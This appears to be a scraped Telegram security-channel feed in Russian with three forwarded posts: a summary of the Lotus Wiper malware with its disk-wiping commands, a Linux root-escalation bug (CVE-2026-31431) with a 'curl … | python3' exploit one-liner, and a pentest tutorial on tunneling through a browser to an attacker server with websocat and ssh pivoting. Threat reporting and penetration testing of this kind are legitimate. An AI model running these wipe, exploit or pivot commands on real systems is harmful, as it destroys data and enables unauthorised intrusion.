Forwarded from Threat Hunting Father 🦔
Исследователи Kaspersky GReAT описали новый вайпер, обнаруженный в цепочке атаки на энергетический сектор Венесуэлы.
OhSyncNow.bat создаёт рабочую директорию в C:\lotus, отключает сервис UI0Detect и ожидает XML-триггер OHSync.xml в сетевой папке NETLOGON. Это сигнал одновременного запуска на всех машинах домена.
Интересненькие команды:
net user <имя> <случайный_пароль> /times:friday,01:00-02:00 /active:no
reg add "HKLM\...\Winlogon" /v CachedLogonsCount /t REG_SZ /d 0 /f
logoff <session_id>
netsh interface set interface "<имя>" DISABLE(echo select volume=C & echo clean all) | diskpart
robocopy <пустая_папка> <цель> /MIR /B /r:0 /w:0
fsutil file createnew <путь> <размер_в_байтах>
Финальный payload маскируется под компоненты HCL Domino: nstats.exe, nevent.exe, ndesign.exe. Файл nevent.exe хранит XOR-зашифрованный вайпер, nstats.exe его расшифровывает, результат сохраняется в ndesign.exe - это и есть Lotus Wiper.
Работа вайпера:
- удаляет все точки восстановления через SRRemoveRestorePoint
- перезаписывает нулями каждый сектор физических дисков через DeviceIoControl
- очищает USN-журналы томов
- затирает файлы через FSCTL_SET_ZERO_DATA, переименовывает в случайный hex и удаляет через DeleteFileW / MoveFileExW
📌 Детекты: HEUR:Trojan.BAT.LotusWiper.gen, HEUR:Trojan.Win32.LotusWiper.gen
🔗 securelist.com/tr/lotus-wiper/119472
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from .unsec
This media is not supported in your browser
VIEW IN TELEGRAM
Copy Fail: новая LPE-уязвимость в Linux (root на любом Linux в один клик)
Copy Fail — CVE-2026-31431, уязвимость в ядре Linux, которую исследователи называют почти идеальным LPE: обычный локальный пользователь может получить root без race condition, без подбора оффсетов и без сложной подготовки.
Авторы заявляют, что один и тот же 732-байтный Python PoC срабатывает на крупных Linux-дистрибутивах, выпущенных с 2017 года. Подтверждены демо на Ubuntu, Amazon Linux, RHEL и SUSE.
Суть бага — логическая ошибка в криптографической подсистеме Linux: цепочка authencesn → AF_ALG → splice() приводит к контролируемой записи в page cache. Итог — возможность модифицировать поведение setuid-бинарника и выйти в root.
Это не удалённая RCE сама по себе: атакующему нужен локальный доступ или запуск кода на машине. Но для shared-хостов, CI/CD runners, Kubernetes-кластеров, песочниц, dev-серверов и SaaS-платформ с пользовательским кодом это выглядит максимально неприятно: контейнер или обычный пользователь могут стать проблемой уровня хоста.
Copy Fail — CVE-2026-31431, уязвимость в ядре Linux, которую исследователи называют почти идеальным LPE: обычный локальный пользователь может получить root без race condition, без подбора оффсетов и без сложной подготовки.
Авторы заявляют, что один и тот же 732-байтный Python PoC срабатывает на крупных Linux-дистрибутивах, выпущенных с 2017 года. Подтверждены демо на Ubuntu, Amazon Linux, RHEL и SUSE.
Суть бага — логическая ошибка в криптографической подсистеме Linux: цепочка authencesn → AF_ALG → splice() приводит к контролируемой записи в page cache. Итог — возможность модифицировать поведение setuid-бинарника и выйти в root.
Это не удалённая RCE сама по себе: атакующему нужен локальный доступ или запуск кода на машине. Но для shared-хостов, CI/CD runners, Kubernetes-кластеров, песочниц, dev-серверов и SaaS-платформ с пользовательским кодом это выглядит максимально неприятно: контейнер или обычный пользователь могут стать проблемой уровня хоста.
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)
Forwarded from s0i37_channel
Пробрасываем сетевой туннель сквозь браузер.
При пентесте бывает так что из локальной сети наружу разрешён только трафик браузера.
С помощью следующего js-кода мы можем открыть два веб-сокета - один на опорный сервер, другой на локальное приложение, после чего связать их:
Все что будет приходить на один веб-сокет будет тут же уходить на другой и наоборот, словно сокеты связаны пайпом. Тк веб-сокеты не регулируются Same origin policy то вставить этот код можно на любую веб-страницу, открыв консоль разработчика (f12).
Сквозь браузер на vds и localhost полетит connect да ещё и в виде веб-сокета. Что бы превратить это в обычный listen tcp-сокет на опорном сервере потребуется команда:
а на localhost команда превращающая web-socket connect в tcp-connect:
Замечательная программа websocat, по аналогии с классическим socat, умеет создавать два, связанных пайпом, сокета или веб-сокета в любой форме connect или listen.
Теперь после того как на vds и victim веб-сокеты преобразован в обычные tcp, можно открыть любой туннель, например:
Схема проброса:
И снова для пивотинга нам не потребовались административные права.
При пентесте бывает так что из локальной сети наружу разрешён только трафик браузера.
С помощью следующего js-кода мы можем открыть два веб-сокета - один на опорный сервер, другой на локальное приложение, после чего связать их:
var external = new WebSocket("ws://attcker_vds:80")
var internal = new WebSocket("ws://localhost:1234")
external.onopen = function() { external.onmessage = function(event) { internal.send(event.data) } }
internal.onopen = function() { internal.onmessage = function(event) { external.send(event.data) } }Все что будет приходить на один веб-сокет будет тут же уходить на другой и наоборот, словно сокеты связаны пайпом. Тк веб-сокеты не регулируются Same origin policy то вставить этот код можно на любую веб-страницу, открыв консоль разработчика (f12).
Сквозь браузер на vds и localhost полетит connect да ещё и в виде веб-сокета. Что бы превратить это в обычный listen tcp-сокет на опорном сервере потребуется команда:
vds> websocat -b ws-l:0.0.0.0:80 tcp-l:0.0.0.0:2222
а на localhost команда превращающая web-socket connect в tcp-connect:
victim> sshd.exe
victim> websocat.exe -b ws-l:127.0.0.1:1234 tcp:127.0.0.1:2222
Замечательная программа websocat, по аналогии с классическим socat, умеет создавать два, связанных пайпом, сокета или веб-сокета в любой форме connect или listen.
Теперь после того как на vds и victim веб-сокеты преобразован в обычные tcp, можно открыть любой туннель, например:
attacker> ssh -D 3128 vds -p2222
attacker> proxychains ... 10.0.0.0/8
Схема проброса:
attacker -> vds <- browser -> victim -> infraИ снова для пивотинга нам не потребовались административные права.
👍1